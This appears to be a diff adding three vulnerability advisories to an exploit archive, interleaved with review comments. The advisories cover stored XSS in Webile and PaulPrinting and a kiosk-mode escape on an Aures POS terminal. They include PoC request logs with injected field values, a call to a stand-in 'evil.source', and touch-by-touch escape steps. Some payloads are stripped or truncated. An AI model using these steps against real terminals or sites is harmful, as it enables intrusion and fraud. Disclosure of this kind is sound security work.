+ +Affected Product(s): +==================== +Product Owner: Webile +Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2022-10-11: Researcher Notification & Coordination (Security Researcher) +2022-10-12: Vendor Notification (Security Department) +2022-**-**: Vendor Response/Feedback (Security Department) +2022-**-**: Vendor Fix/Patch (Service Developer Team) +2022-**-**: Security Acknowledgements (Security Department) +2023-07-03: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (Guest Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious +script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. + +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious +source and persistent manipulation of affected application modules. 
+ +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] new_file_name +[+] i + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. +For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. + + +Vulnerable Source: Send +Send message to phone listing +
    +
    Message
    +
    +
    20:10:11  
    +test2"

    +
    +history logs messages + + + + + + + + + + + +
    +
    MessageDateAction
    +
    +
    test2"2022/07/17 20:10 + +   + + +   +
    + + + +--- PoC Session Logs #1 (POST) --- (Add) +http://localhost:8080/file_action +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 210 +Origin:http://localhost:8080 +Connection: keep-alive +Referer:http://localhost:8080/webile_files +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>""} +- +POST: HTTP/1.1 200 OK +Content-Type: application/json +Connection: keep-alive +Content-Encoding: gzip +Transfer-Encoding: chunked +- +http://localhost:8080/evil.source +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer:http://localhost:8080/webile_files +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Content-Type: application/octet-stream +Connection: keep-alive +Content-Length: 0 +- +Cookie: +treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 + + + +--- PoC Session Logs #2 (POST) --- (Send) +http://localhost:8080/send +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 180 +Origin:http://localhost:8080 +Connection: keep-alive 
+Referer:http://localhost:8080/webile_send +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +i={"os":"Windows Windows 10","b":"firefox 102.0","c":">""} +- +POST: HTTP/1.1 200 OK +Content-Type: application/json +Connection: keep-alive +Content-Encoding: gzip +Transfer-Encoding: chunked +- +http://localhost:8080/evil.source +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer:http://localhost:8080/webile_send +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Content-Type: application/octet-stream +Date: Sun, 17 Jul 2022 18:08:33 GMT +Connection: keep-alive +Content-Length: 0 + + +Security Risk: +============== +The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium. \ No newline at end of file diff --git a/exploits/php/webapps/51617.txt b/exploits/php/webapps/51617.txt new file mode 100644 index 000000000..193bbaa8a --- /dev/null +++ b/exploits/php/webapps/51617.txt 
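Review bot: The "Vulnerable Parameter(s)" list in this hunk (`new_file_name`, `i`) does not match its own PoC session logs: `i` is only the wrapper for a JSON object, the Add request to `/file_action` carries the tainted value in the `new_file_name` member of that object, and the Send request to `/send` carries it in the `c` member (`"c":">""`), which is never named anywhere in the advisory. Name `i` (JSON) with the members `new_file_name` (file_action, action create) and `c` (send) so a defender knows exactly which fields need output encoding. The hunk also has no "Solution - Fix & Patch" section, unlike the Aures advisory that follows in this same patch, and the timeline leaves Vendor Response/Feedback, Vendor Fix/Patch and Security Acknowledgements as `2022-**-**`; state plainly whether Webile v1.0.1 is unpatched and give the mitigation (HTML-encode the file name and the message text before rendering them into the file listing and the "history logs messages" table). Finally, the "Vulnerable Source: Send" block between the description and the session logs is pasted rendered HTML (the Message / Date / Action table cells, `test2"`, timestamps) rather than source, which is unreadable in a text advisory; keep the raw HTML fragment that shows the unencoded `c` value, or drop the block.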
@@ -0,0 +1,185 @@ +Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2323 + + +Release Date: +============= +2023-07-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2323 + + +Common Vulnerability Scoring System: +==================================== +7.2 + + +Vulnerability Class: +==================== +Privilege Escalation + + +Current Estimated Price: +======================== +3.000€ - 4.000€ + + +Product & Service Introduction: +=============================== +KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or +freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk +features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. +With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to +manage customer cards and promotions. Queue management can also be optimized. + +(Copy of the Homepage:https://aures.com/de/komet/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of +the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. 
+ + +Affected Product(s): +==================== +Aures Technologies GmbH +Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise) + + +Vulnerability Disclosure Timeline: +================================== +2023-05-09: Researcher Notification & Coordination (Security Researcher) +2023-07-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Open Authentication (Anonymous Privileges) + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal +(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers +to bypass the kiosk mode to compromise the local file system and applications. + +It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are +able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security +vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local +privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate +local file-system information of the compromised windows based operating system. + +No keyboard or connections are required to manipulate the service booking and payment terminal. 
The booking and payment terminal system +vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access. + +Vulnerable Operating System(s): +[+] Windows 10 (IoT Enterprise) + +Affected Component(s): +[+] Context Menu + +Affected Function(s): +[+] Web Search +[+] Share (Teilen) + + +Proof of Concept (PoC): +======================= +The local vulnerability can be exploited by local attackers with physical device access without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: Sheet +Touch Display => Select Food Item => Highlight Text +=> Open Context Menu => Extend Context Menu => Web-Search +=> Browser => Local File System => Compromised! + + +Manual steps to reproduce the vulnerability ... +01. First touch the monitor display to move on from standby +02. Select an food item from the menu of immergrün (we recomment the cesar wraps) +03. Push the information button of the selected food item +04. Push twice via touch to mark the selected food item text +05. Press a third time after you have marked the context by holding it down on the touch display +06. Now the function context menu of the operating system for highlighted text appears +07. On the context menu appearing 3 dots to extend the visible function menu +08. Select the web-search or share function for the highlighted content in the context menu +09. 
The browser of the operating system opens on the main front screen +10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files) +10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context) +10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information) +10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion) +10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.) +10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols +10.7 Attackers are able to perform man in the middle attacks from the local computer system +11.0 Successful reproduce of the security vulnerability! + + +Reference(s): Pictures +- 1.png (Terminal A) +- 2.png (Terminal B) +- 3.png (Escape) +- 4.png (Awareness) + + +Solution - Fix & Patch: +======================= +The security vulnerabilities can be patched by following steps: +1. Disable the content menu to extend +2. Disable the context menu +3. Disable web-search +4. Disable to mark text inputs & texts +5. Disallow to open not white listed websites +6. Disable to download files +7. Restrict the web-browser access +8. Disallow the file browser +9. Disable the browser debug modus +10. Reconfigure the local firewall to allow and disallow connections +11. Change the access permission to prevent exfiltration + + +Security Risk: +============== +The security risk of the vulnerability in the local booking and payment terminal system is considered high. 
+The issue can be easily exploited by local attackers with simple interaction via the touch display. +Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse +it for further simple or more complex attack scenarios. + + +Credits & Authors: +================== +Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. +Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther \ No newline at end of file diff --git a/exploits/php/webapps/51618.txt b/exploits/php/webapps/51618.txt new file mode 100644 index 000000000..da965a8b1 --- /dev/null +++ b/exploits/php/webapps/51618.txt 
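Review bot: This advisory is committed as `exploits/php/webapps/51617.txt`, but its own metadata says Exploitation Technique: Local, Vulnerable Operating System(s): Windows 10 (IoT Enterprise), and Authentication Type: Open Authentication, and the reproduction steps describe a physical kiosk-mode escape through the touch context menu; nothing in it involves PHP or a web application. It should be filed under a Windows local category, with the index entry corrected to match, otherwise anyone filtering the database by platform or by remote/local will miss it. Smaller points in the same hunk: the "Reference(s): Pictures" entries (1.png to 4.png) are not part of this change, so either add them or remove the reference; fix step 1 reads "Disable the content menu to extend" where "context menu" is meant; and the text has several typos that should be cleaned before merge ("recomment", "fron display", "Privilege Escaltion", "no user user interaction"). The timeline lists only Researcher Notification and Public Disclosure, so it is unclear whether Aures or the operator (immergrün) were ever notified; add those dates, or an explicit "no vendor response" line, and say whether the assigned-access/kiosk configuration has since been hardened to block the context menu and web search entries the Solution section lists.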
@@ -0,0 +1,257 @@ +Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2285 + + +Release Date: +============= +2023-07-19 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2285 + + +Common Vulnerability Scoring System: +==================================== +5.8 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. + +(Copy of the Homepage:https://codecanyon.net/user/codepaul ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application. 
+ + +Affected Product(s): +==================== +CodePaul +Product: PaulPrinting (2018) - CMS (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2022-08-25: Researcher Notification & Coordination (Security Researcher) +2022-08-26: Vendor Notification (Security Department) +2022-**-**: Vendor Response/Feedback (Security Department) +2022-**-**: Vendor Fix/Patch (Service Developer Team) +2022-**-**: Security Acknowledgements (Security Department) +2023-07-19: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (User Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code. +After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins +in the backend (listing). + +The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own +malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in +the backend (listing). 
+ +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /printing/register +[+] /account/delivery + +Vulnerable Input(s): +[+] First name +[+] Last name +[+] Address +[+] City +[+] State + +Vulnerable Parameter(s): +[+] firstname +[+] lastname +[+] address +[+] city +[+] state + +Affected Module(s): +[+] Frontend Settings (./printing/account/setting) +[+] Frontend Delivery Address (./printing/account/delivery) +[+] Backend User Preview Listing +[+] Backend Delivery Address Contact Review + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open your browser and start a http session tamper +2. Register in the application by login click to register +3. Inject to the marked vulnerable input fields your test payload +4. Save the entry by submit via post method +5. Login to the account and preview the settings +Note: Administrators in the backend have the same wrong validated context that executes on preview of users +6. The script code executes on preview of the profile - settings +7. Successful reproduce of the first vulnerability! +8. Followup by opening the Delivery address module +9. Add a contact and add in the same vulnerable marked input fields your test payload +Note: T he script code executes on each review of the address in the backend or user frontend +10. Successful reproduce of the second vulnerability! + + +Exploitation: Payload +"
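Review bot: Module paths in this hunk are inconsistent: "Vulnerable Module(s)" lists `/printing/register` and `/account/delivery`, while "Affected Module(s)" lists `./printing/account/setting` and `./printing/account/delivery`; use one base path (`/printing/...`) throughout so the delivery endpoint is identified unambiguously. The title "PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities" carries no version although the body says "(v2018)", and the timeline again leaves Vendor Response/Feedback, Vendor Fix/Patch and Security Acknowledgements as `2022-**-**`; put the version in the title and state whether a fixed release exists. As with the Webile entry, there is no "Solution - Fix & Patch" section: add one that says the `firstname`, `lastname`, `address`, `city` and `state` values must be HTML-encoded when rendered in the frontend settings page, the delivery address page and the backend user and address listings, which is where the stored payload executes according to the description. Wording: "Thus allows to perform an execute on each interaction" should read "This allows execution on each interaction", and the note after step 9 has a stray space in "T he script code". The hunk as shown ends at `+Exploitation: Payload` followed by a lone `+"`, so the payload section looks truncated; check that the committed file is complete before merging.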